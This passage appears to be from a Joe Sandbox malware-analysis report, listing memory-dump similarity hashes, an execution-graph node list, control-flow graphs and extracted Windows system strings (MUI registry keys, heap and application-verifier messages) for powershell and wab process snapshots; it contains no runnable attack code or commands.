                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$4\Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-970213993
                                            • Opcode ID: a06458ee5bc3f9a04eb404c2a126c10665997db4a4ed34c545a0a93f200b9d12
                                            • Instruction ID: 4442d61e55cd342044264826c0c6c2d50588415f192a194e00afc464e8eb9084
                                            • Opcode Fuzzy Hash: a06458ee5bc3f9a04eb404c2a126c10665997db4a4ed34c545a0a93f200b9d12
                                            • Instruction Fuzzy Hash: FD617EF4A01205DFEB24CF59C885EE9BBB2EF89314F14C19AD905AB251DBB5E841CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4[Bl
                                            • API String ID: 0-2625575403
                                            • Opcode ID: 71a897067878b85fa30595031186aafe3b7a25dfdb9950d34cfe3d1851a5f221
                                            • Instruction ID: e086a84a830aff46c08a4f113afd9527132155d5be7c108244bd4938dc30be85
                                            • Opcode Fuzzy Hash: 71a897067878b85fa30595031186aafe3b7a25dfdb9950d34cfe3d1851a5f221
                                            • Instruction Fuzzy Hash: D2D16CB4A002199BEB64DB64CD91BEEBBB2FF84300F1081E5D9096B345CB759E81CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4[Bl$4[Bl$4[Bl$4[Bl
                                            • API String ID: 0-2625575403
                                            • Opcode ID: 6165dd0f5f73860180b5c0cbb1ef7e50c1f53387aa936b23ce176d69faf57850
                                            • Instruction ID: ae6e1fcc178c97f06f20cef1d53ed8a74983379d4085227caf9c91aacb3eeeab
                                            • Opcode Fuzzy Hash: 6165dd0f5f73860180b5c0cbb1ef7e50c1f53387aa936b23ce176d69faf57850
                                            • Instruction Fuzzy Hash: 9AA16CB4A002199FEB64DB64CD51BEDBBB2EB45304F1080E5E9086F385CB759E81CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Al$4\Bl$4\Bl$@bBl
                                            • API String ID: 0-399246063
                                            • Opcode ID: 52fe30ab7c2c8a8bb1b491d898a7cef3689601cc39aaebc10528dfa8ecc582cf
                                            • Instruction ID: 9b8cac94b351c0aeeaf11735a481d7d7e4c43196193f5145660b1318d00f5439
                                            • Opcode Fuzzy Hash: 52fe30ab7c2c8a8bb1b491d898a7cef3689601cc39aaebc10528dfa8ecc582cf
                                            • Instruction Fuzzy Hash: FB9118B8A00205DFEB64CF58C595EE9BBF2EF88314F198099E905AB365C776EC41CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: P0@l$P0@l$GBl$GBl
                                            • API String ID: 0-2195032480
                                            • Opcode ID: 7f56d50943d1b7e34490497c5cad8b929be9b225fbe23cf21d6affb1d747279c
                                            • Instruction ID: bbffda31db6be9d946f0cc085526687f5418fa54da8e4c70b61caa6123bd7f9f
                                            • Opcode Fuzzy Hash: 7f56d50943d1b7e34490497c5cad8b929be9b225fbe23cf21d6affb1d747279c
                                            • Instruction Fuzzy Hash: 9661E7F5F002019FEB249B698451BFEB7E2EFC9210F14C0A9E9169F284CAB1DD41CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: P0@l$P0@l$GBl$GBl
                                            • API String ID: 0-2195032480
                                            • Opcode ID: 69ea2448ea369add94c2156d22e9a1d03808fba3954da31fda3c1f8d59b10ada
                                            • Instruction ID: aee744ee430332b93c9f093261e5d6dcea6a1b584a150c24384bc148d03541ae
                                            • Opcode Fuzzy Hash: 69ea2448ea369add94c2156d22e9a1d03808fba3954da31fda3c1f8d59b10ada
                                            • Instruction Fuzzy Hash: 8B61D8B5B00202DFE7249B688441BFAB7E2EF85210F54C0A9E9569F285CBB1FC41CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4\Bl$@bBl$@bBl$L?l
                                            • API String ID: 0-4098415645
                                            • Opcode ID: b9cc202bed84c6b2ecd653cc27c6344c694fae87ed8c276140a3eb6facdd12b9
                                            • Instruction ID: 30c02847d5807e04b4f0ee84066808330ff6ef97153d93108ec4ab8ff84b1ad8
                                            • Opcode Fuzzy Hash: b9cc202bed84c6b2ecd653cc27c6344c694fae87ed8c276140a3eb6facdd12b9
                                            • Instruction Fuzzy Hash: A6515DF4B10205DBEB24CB58C481EBABBF2EF89314F1885A9E8056B355C7B9E845CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \}=l$\}=l$GBl$GBl
                                            • API String ID: 0-3213173544
                                            • Opcode ID: f9af33018160ab081503ddea2bbe9005b41fb93d37bfd1d4acc57b7bf34ee3a0
                                            • Instruction ID: c6fc1fdcfea6b9a19d3db9141faa2ec9246319762c90a23df5d8bc9e8360cb3c
                                            • Opcode Fuzzy Hash: f9af33018160ab081503ddea2bbe9005b41fb93d37bfd1d4acc57b7bf34ee3a0
                                            • Instruction Fuzzy Hash: BB4129FA7002028FFB356A788451BFBB7A6DFC2250F1484BBDC858B291CAB5C955C761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.20093652335.0000000007BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7bb0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4\Bl$4\Bl$@bBl$@bBl
                                            • API String ID: 0-4161283724
                                            • Opcode ID: 66a8bc56d3e1f63555a1dc3eb55054fe36850a02e999f68c7095ab3c105276b7
                                            • Instruction ID: 75d49b5491b15b31c4190c56af54b6b87f8e17a16ee426c417d11e947a8960f9
                                            • Opcode Fuzzy Hash: 66a8bc56d3e1f63555a1dc3eb55054fe36850a02e999f68c7095ab3c105276b7
                                            • Instruction Fuzzy Hash: 2E416AF4A00205EBEB24CF95C885EB9BBB2FF85314F14C19AD9156B251CBB5A842CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:0%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:19.5%
                                            Total number of Nodes:77
                                            Total number of Limit Nodes:1
                                            execution_graph 56651 232f2022 206 API calls 56578 232ebf20 353 API calls 56653 232eb420 200 API calls 56579 23328322 556 API calls 56565 23332b20 56567 23332b2a 56565->56567 56568 23332b31 56567->56568 56569 23332b3f LdrInitializeThunk 56567->56569 56582 233ad527 GetPEB LdrInitializeThunk 56583 2337db2a 14 API calls 56655 232e7a30 348 API calls 56656 232eb830 552 API calls 56586 2331c310 333 API calls 56588 2331cb10 GetPEB GetPEB GetPEB GetPEB 56659 232e640d 556 API calls 56660 232eec0b 593 API calls 56589 233a9313 11 API calls 56590 2337c51d 10 API calls 56663 2331d600 695 API calls 56593 23325900 332 API calls 56664 232e821b 353 API calls 56665 23386400 328 API calls 56594 2337330c 330 API calls 56666 232e9610 555 API calls 56668 232f2410 602 API calls 56669 232f9810 580 API calls 56600 2331af72 356 API calls 56671 232eb260 347 API calls 56672 232e7860 196 API calls 56601 232ec170 593 API calls 56604 232f1f70 350 API calls 56606 2332bb5b 331 API calls 56607 2332415f 330 API calls 56608 232ec140 337 API calls 56609 232ea740 415 API calls 56677 232f3640 341 API calls 56678 2331ea40 352 API calls 56614 2330e547 561 API calls 56616 232fb950 546 API calls 56617 232ee9ac 594 API calls 56680 232ee0a4 352 API calls 56681 232ebea0 338 API calls 56682 232f00a0 562 API calls 56683 232f06a0 352 API calls 56619 233243a0 351 API calls 56685 232e82b0 329 API calls 56686 2330d690 9 API calls 56687 23372e9f 378 API calls 56574 23332a80 LdrInitializeThunk 56629 232e8196 10 API calls 56690 232ea290 540 API calls 56691 232ec090 347 API calls 56692 232efe90 14 API calls 56693 232fc690 GetPEB 56694 2331acf0 337 API calls 56695 2331ccf0 GetPEB GetPEB 56696 233262f0 601 API calls 56700 232e72e0 327 API calls 56701 232f58e0 782 API calls 56630 2331e9e0 344 API calls 56702 233166e0 426 API calls 56631 233269e0 203 API calls 56633 232f1ffa LdrInitializeThunk 56634 232e73f0 8 API calls 56705 2331f4d0 340 API calls 56636 23396bde 571 API calls 56637 232ee3c0 405 API calls 56638 232e81c0 195 API calls 56639 232ebfc0 13 API calls 56707 232eb0c0 414 API calls 56640 232f1dc0 19 API calls 56641 233051c0 376 API calls 56709 23326cc0 334 API calls 56643 2332c5c6 554 API calls 56645 232e9fd0 328 API calls 56646 23371fc9 590 API calls 56647 232f3bd0 17 API calls

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 9 233334e0-233334ec LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3d0a325f92e5108cb6e1d22f94b088fbda6b71c008617554d0f993efa661ce8f
                                            • Instruction ID: 33041bf17c1e6ba1a66add451e965f53f9f1e6952597fbcf46d3df245d4ab75d
                                            • Opcode Fuzzy Hash: 3d0a325f92e5108cb6e1d22f94b088fbda6b71c008617554d0f993efa661ce8f
                                            • Instruction Fuzzy Hash: C3900235A1614802D54076584654706104547D0202F61C855A1414928DC7A68E5175A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 5 23332b90-23332b9c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1dc8842f7650f58084652694f953fdeafe57cf91d4fec4bd02bae829ef91ceec
                                            • Instruction ID: 05eaf9ee02a3c277f58ea14db21309a8b493cfa55a53d33c60fc8f77a874dd05
                                            • Opcode Fuzzy Hash: 1dc8842f7650f58084652694f953fdeafe57cf91d4fec4bd02bae829ef91ceec
                                            • Instruction Fuzzy Hash: B19002356120CC02D5507658854474A004547D0302F55C855A5414A18DC6A68D917121
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6 23332bc0-23332bcc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 25b92eca7d962671cff3d2bfdb2e451e91379c9a48bb244780643f19c2e1a7c4
                                            • Instruction ID: ca81c282243f51274f93ad4e6cfc01589780e60556a5c090e06c84f9b4dd4dce
                                            • Opcode Fuzzy Hash: 25b92eca7d962671cff3d2bfdb2e451e91379c9a48bb244780643f19c2e1a7c4
                                            • Instruction Fuzzy Hash: 5F90023561204802D5407A985548646004547E0302F51D455A6014915EC6768D917131
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4 23332a80-23332a8c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d49fa1761faaac219e3eb0564f468fbf7932e7e3f40d93d4931e430807d7bea7
                                            • Instruction ID: 4d214e115fefe33bbd51c92a0697e659b3974f2d53c0c77ca10dab93e8fe0958
                                            • Opcode Fuzzy Hash: d49fa1761faaac219e3eb0564f468fbf7932e7e3f40d93d4931e430807d7bea7
                                            • Instruction Fuzzy Hash: 4190026561304403454576584554616404A47E0202B51C465E2004950DC5368D917125
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 8 23332eb0-23332ebc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: be877f6c9da23f829956c5f8d82f2f93fb2e090d9241063a712e125c305ed40e
                                            • Instruction ID: a9917f03acf29bc31408bf43ec5ad6d48dcabd705039896c156310ed8009989c
                                            • Opcode Fuzzy Hash: be877f6c9da23f829956c5f8d82f2f93fb2e090d9241063a712e125c305ed40e
                                            • Instruction Fuzzy Hash: 3E90023561244802D5407658495470B004547D0303F51C455A2154915DC6368D517571
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7 23332d10-23332d1c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c74cada73afa7f7cd0ba591c1e30fbd1140d352730743757e8afde8deb3f67f1
                                            • Instruction ID: f01e03031c8fdfd35e1e2a511d0aaf58c6b77787a19d6a2c793ec18458bfe2d6
                                            • Opcode Fuzzy Hash: c74cada73afa7f7cd0ba591c1e30fbd1140d352730743757e8afde8deb3f67f1
                                            • Instruction Fuzzy Hash: 1090023561204813D55176584644707004947D0242F91C856A1414918DD6678E52B121
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 23332b2a-23332b2f 1 23332b31-23332b38 0->1 2 23332b3f-23332b46 LdrInitializeThunk 0->2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 95d8cdea37b94cfddb21fe2bd961448824eca6635a24a7cf40e3a6cc01aa5223
                                            • Instruction ID: 6c182ae2c7ebc986227601c83d3a804ddc1bb9b4f9125056a02074bba9eefa3c
                                            • Opcode Fuzzy Hash: 95d8cdea37b94cfddb21fe2bd961448824eca6635a24a7cf40e3a6cc01aa5223
                                            • Instruction Fuzzy Hash: CBB09B71D124C5C5D741FB604B08B07794477D1701F15C495D3464641F8779C691F175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1201 232ed2ec-232ed32d 1202 2334a69c 1201->1202 1203 232ed333-232ed335 1201->1203 1205 2334a6a6-2334a6bf call 233abd08 1202->1205 1203->1202 1204 232ed33b-232ed33e 1203->1204 1204->1202 1206 232ed344-232ed34c 1204->1206 1213 2334a6c5-2334a6c8 1205->1213 1214 232ed56a-232ed56d 1205->1214 1208 232ed34e-232ed350 1206->1208 1209 232ed356-232ed3a1 call 23335050 call 23332ab0 1206->1209 1208->1209 1211 2334a5f6-2334a5fb 1208->1211 1225 2334a600-2334a61a call 232e7220 1209->1225 1226 232ed3a7-232ed3b0 1209->1226 1216 232ed5c0-232ed5c8 1211->1216 1218 232ed54d-232ed54f 1213->1218 1217 232ed56f-232ed575 1214->1217 1220 232ed63b-232ed63d 1217->1220 1221 232ed57b-232ed588 GetPEB call 23303bc0 1217->1221 1218->1214 1223 232ed551-232ed564 call 23313262 1218->1223 1227 232ed58d-232ed592 1220->1227 1221->1227 1223->1214 1241 2334a6cd-2334a6d2 1223->1241 1245 2334a624-2334a628 1225->1245 1246 2334a61c-2334a61e 1225->1246 1231 232ed3ba-232ed3cd call 232ed736 1226->1231 1232 232ed3b2-232ed3b4 1226->1232 1229 232ed594-232ed59d call 23332a80 1227->1229 1230 232ed5a1-232ed5a6 1227->1230 1229->1230 1237 232ed5a8-232ed5b1 call 23332a80 1230->1237 1238 232ed5b5-232ed5ba 1230->1238 1252 2334a658 1231->1252 1253 232ed3d3-232ed3d7 1231->1253 1232->1231 1236 2334a630-2334a63b call 233aad61 1232->1236 1236->1231 1255 2334a641-2334a653 1236->1255 1237->1238 1238->1216 1247 2334a6d7-2334a6db call 23332a80 1238->1247 1241->1214 1245->1236 1246->1245 1254 232ed52e 1246->1254 1256 2334a6e0 1247->1256 1260 2334a660-2334a662 1252->1260 1258 232ed3dd-232ed3f7 call 232ed8d0 1253->1258 1259 232ed5cb-232ed623 call 23335050 call 23332ab0 1253->1259 1257 232ed530-232ed535 1254->1257 1255->1231 1256->1256 1261 232ed549 1257->1261 1262 232ed537-232ed539 1257->1262 1258->1260 1270 232ed3fd-232ed44e call 23335050 call 23332ab0 1258->1270 1275 232ed625 1259->1275 1276 232ed642-232ed645 1259->1276 1260->1214 1265 2334a668 1260->1265 1261->1218 1262->1205 1266 232ed53f-232ed543 1262->1266 1272 2334a66d 1265->1272 1266->1205 1266->1261 1270->1252 1281 232ed454-232ed45d 1270->1281 1278 2334a677-2334a67c 1272->1278 1280 232ed62f-232ed636 1275->1280 1276->1254 1278->1220 1280->1257 1281->1272 1282 232ed463-232ed492 call 23335050 call 232ed64a 1281->1282 1282->1280 1287 232ed498-232ed49e 1282->1287 1287->1280 1288 232ed4a4-232ed4aa 1287->1288 1288->1220 1289 232ed4b0-232ed4cc GetPEB call 23305d90 1288->1289 1289->1278 1292 232ed4d2-232ed4ef call 232ed64a 1289->1292 1295 232ed526-232ed52c 1292->1295 1296 232ed4f1-232ed4f6 1292->1296 1295->1217 1295->1254 1297 232ed4fc-232ed524 call 23314ca6 1296->1297 1298 2334a681-2334a686 1296->1298 1297->1295 1298->1297 1300 2334a68c-2334a697 1298->1300 1300->1257
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.1#
                                            • API String ID: 0-981772112
                                            • Opcode ID: d37313e59d9ebe0685efbe476c9d713e9913104c169082add5d66ecf520e35c0
                                            • Instruction ID: 29a1ffbdac5746678c8995851849a10efbb27a95c78b73f1383e4659d1e4dc32
                                            • Opcode Fuzzy Hash: d37313e59d9ebe0685efbe476c9d713e9913104c169082add5d66ecf520e35c0
                                            • Instruction Fuzzy Hash: 11B1AEB29193419FC721DF24C881B5FB7E8EB84714F4549AEF998D7200D774EA88CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 232ED06F
                                            • @, xrefs: 232ED09D
                                            • h.1#, xrefs: 2334A5D2
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 232ED136
                                            • @, xrefs: 232ED2B3
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 232ED202
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 232ED263
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 232ED0E6
                                            • @, xrefs: 232ED24F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.1#
                                            • API String ID: 0-4079263534
                                            • Opcode ID: e41f230475d55d3f361ac3e7ade8544d5205e50523d390d493ef1016280b61a6
                                            • Instruction ID: 0fc64d83b471883c1f8edd7aaee6d36167309ad6a6feb9cdd51fe707d971a778
                                            • Opcode Fuzzy Hash: e41f230475d55d3f361ac3e7ade8544d5205e50523d390d493ef1016280b61a6
                                            • Instruction Fuzzy Hash: C4A19EB19183459FD321DF20C981B9FB7E8FB84715F4049AEFA8896241D774EA48CB93
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe
                                            • API String ID: 0-83573970
                                            • Opcode ID: a4d8fad8a2bb42f2060911c7bcfe897c0d70f44879ea45be1d0926709362f56b
                                            • Instruction ID: 8199285a83549581917688e09253389ee5c2810dc2233fed3a145ecab4878975
                                            • Opcode Fuzzy Hash: a4d8fad8a2bb42f2060911c7bcfe897c0d70f44879ea45be1d0926709362f56b
                                            • Instruction Fuzzy Hash: A451AE715083519FE325DF188C80AABB7ECEFC4650F044A9DBAA9CB241E770D745CBA6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                            • API String ID: 0-2224505338
                                            • Opcode ID: a7d7b07aa16f7bbbb56211fba571b7a584439d539a2ad3c1475a3314de7fbae9
                                            • Instruction ID: 5a9bdc602adfda2cd867672c45381bf4feeeed87aea5f53a890bbebe3f825aa1
                                            • Opcode Fuzzy Hash: a7d7b07aa16f7bbbb56211fba571b7a584439d539a2ad3c1475a3314de7fbae9
                                            • Instruction Fuzzy Hash: CB512432511385EFE321DF54CC85E1A73E8EF08661F2588D9F509DB622C671FB80CA25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • VerifierDlls, xrefs: 2337893D
                                            • AVRF: -*- final list of providers -*- , xrefs: 2337880F
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 233786E7
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 233786BD
                                            • VerifierFlags, xrefs: 233788D0
                                            • VerifierDebug, xrefs: 23378925
                                            • HandleTraces, xrefs: 2337890F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
